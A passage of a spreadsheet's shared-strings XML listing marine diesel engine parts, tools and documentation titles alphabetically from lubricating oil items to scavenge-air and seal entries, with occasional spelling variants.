  </si>
  <si>
    <t>LUBRICATING OIL BOTTOM TANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBRICATING OIL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBRICATING OIL OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBRICATING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBRICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBRICATOR DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MACH.WOOD-SQUARE DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING LOWER SHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-COOLING OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN STUFF.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN STUFF.BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-LUBRICATING OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-STARING AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-STARTING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAKERS FOR BEARINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAN B&amp;W DOUBLE JIB CRANE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MANOEUVRING CONSOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MANOEUVRING GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MANOEUVRING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MANOEUVRING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MANOMETER VALVE,FE-/MALE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MANUAL HIGH PRESSURE PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAOUNTING PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MARKERS FOR BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MARKING OF CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MC PROD.REC,INSTAL.OF ENGINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEAS.INSTR.AX.VIBR.DAMP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEAS.POINTS,CYL/LIN.WE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEAS.POINTS,CYL:LIN,WEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEAS.TOOL,FUEL.P.LEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEASURING ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEASURING TOOL F.CYL.LIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEASURING TOOL F.CYL.LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEASURING TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MECH.COMTROL GEAR,TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MILL+GRIND.WH.FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MILL+GRIND.WH.ST.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MILLER AND GRINDING WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MIN.REQ.SPACE FOR ENGINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MISC.LIST AND DRAWINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MISC.SPARE PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MORSE CONE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.CHAINWHEEL ON CAMSH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.OF AX.VIBR.DAMPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.OF SAFETY+INDIC.VAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.TOOL.STUFF.B.SPRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING OF LUBRICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING OF LUBRICATORS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING OF THRUST PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">MOUNTING RING </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTINGS-SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUTING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MULTICORE CABLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MULTIPLE PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NECK FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NEVER SEEZ (NS-160)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NEVER SEEZ(NS-160)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NEVER-SEEZ(NS-160)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NON-RET.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NON-RETURN VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NON-RETURN VALVES,MALE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT DIE-METRIC THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT FOR CONN.ROD.STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT FOR CYL.COVER STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT.HEXAGON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUTS FOR HYDR.TIGHTENING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>O-RING*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>O-RINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL GUARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL PAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL THROW RING-LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL-MIST DETECTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OPEN EDGED IMPACT WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OPEN ENDED IMPACT WRENCH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OPEN ENDED WRENCHES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OPERATION WITH VIT FUEL PUMPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORDER LIST-AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORDER LIST-TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORIFICE PIATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVAL FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVAL FLANGES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVERHAULING 2-STROKE ENGINE.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>P.BARREL*TOP COVER-COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING LIQUID</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING RINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING-ANGULAR-FIBRE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING-EXHAUST GAS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING-OVAL-RUBBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING-RECTANGLE-FIBRE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING-RECTANGLE-RUBBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING-ROUND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING-ROUND-FIBRE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING-RUBBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PAINT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PAINTING FOR MAIN ENGINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PAL-LOCK NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PANGLE AND PANEL TOOL-901</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PANGLE AND PANEL TOOLS-901</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PANGLE AND PANEL TOOLS-902</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PANGLE AND PANEL TOOLS-904</t>
  </si>
  <si>
    <t>PANGLE AND PANEL TOOLS-906</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARALLEL KEY SLIDING FIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARALLEL KEY-SLIDING FIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS FOR TERMINAL BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PERFORATED CYL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIN GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIN GAUGE FOR CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIN GAUGE FOR CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIN WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIN WRENCH-STARTING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BEND-90 DEG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BEND-90 DEG.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BENDS 90 DEG.M/F</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BENDS.90 DEG.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BOTTOM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BOTTOMS WITH SRG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BRANCHES WITH SRG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE CLAMP WITHOUT FLAPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE CLAMP-1 FLAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE CLAMP-2 FLAPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE CLAMPS WITHOUT FLAPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE CONICAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE COOLING INSERT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR COOLING INSERT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR MAN HOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE HOLDERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE ON CYLINDER SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-BOTTOMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-CLAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-DRAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-EXHAUST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES ON CYLINDER SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIST.+ROD+STUFF.BOX.TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON COOL.OIL-CONTROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON FOR REG.HANDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON RING EXPANDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON RING STEEL.+C.IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON ROD STUFFING BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIVOT F.DIAL GUAGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLAIN PLUGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE FOR COMPONENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE IN MAN.CONSOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE IRON AND STEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE LISTS-CUTTING PLANS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE WITH PNEUMAICS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE WITH PNEUMATICS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE(SHAPED)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE-GALVANIZED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE-IRON AND STEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATEFORM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATES FOR BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATES-CHARGING AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORMS-SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUG FOR COUPLINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUG FOR TOOTHED RACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUG RIVET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUG SREWS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUG SREWS WITH SRG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUG-PUMP BARREL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUGS WITH SRG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUGS*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUNGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PNEUMATIC VALVE UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREC.STEEL PIPES W.CERT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREHEATING CHART H.F.O.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREHEATING COOLING WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESS.GAUGE&amp;THERMOMETER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE GAUGE ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE GAUGE DIAL TYPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE GAUGE PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE GAUGE SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE SPRING.LEFT-H.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE SPRING,RIGHT-H.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE STATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE TEST TOOL.PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">PROFIL OF ENGINE SEATING </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROFILE OF ENGINE SEATING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULL ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULL ROD HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULL ROD PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULL ROD UNION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULL-LIFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP B.COMP.WITH TOP COVER AND SUCTION V</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP BARREL COMPLETE WITH PLUNGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP-PNEUM.AND HYDR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP-PNEUM.AND HYDR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUSH BUTTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC CAST CYLINDER LINERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FLAME-HARDN.PISTON ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS.FOR PISTON RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS.FOR PISTON RINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QUAL.CONTR./SCHEMES/INSP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QUAL.CONTR./SCHEMES/INSP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QUAY TRIAL&amp;SEA TRIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QUAY TRIAL AND SEA TIRAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QUICK COUPLING COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QUICK RELEASE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REAMER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RED.ADAPTORS, MALE/FEMALE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RED.ADAPTORS,MALE/FEMALE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEDUCING NIPPLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REDUCING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REGULATING GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REGULATING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RELIEF VALVE*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RESTRICTION PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAIN.TOOL-M.BRG.SHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING RINGS F.BORING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING RINGS F.BORINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING RINGS F.SHAFTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING TOOL,CRANK BRG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING TOOL,X-HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING TOOL,X-HEAD BRG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REVERSING CHAMBER WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REVERSING CHAMBER-WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RING FOR PISTON SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RING IMPACT WRENCHS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RING W.COPPER COLLAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RIVET-COUNTERSUNK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RIVET-ROUND HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROD.LIFT-ROTATION CHECK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER GUIDE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROUND CLAMP-WIRE ROPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROUND CLAMP-WIRE ROPE END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROUND IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROUND STEEL BAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROUND STEEL BARS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RPM COOR.TO TELEGR.ORDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RUBBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RUBBER COVER F.CROSHEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCARF JOINT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAV.AIR DRAIN SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAV.AIR REC.+PIPES REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAV.AIR RECEIVER COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAV.AIR SPACE-DRAIN PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAVENGE AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAVENGING AIR RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">SCRAPER RING </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING HOUSING LOW.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING-AXIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW FOR PISTON ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW WITH INSIDE HEXAGON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW WITH SPECIAL HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW-HEXAGON HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW-SPECIAL THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREWS W.SPEC.THREAD TOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREWS W.SPEC.THREAN TOL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREWS WITH INSIDE HEXAGON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAL.AIR PIPES-EXH.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
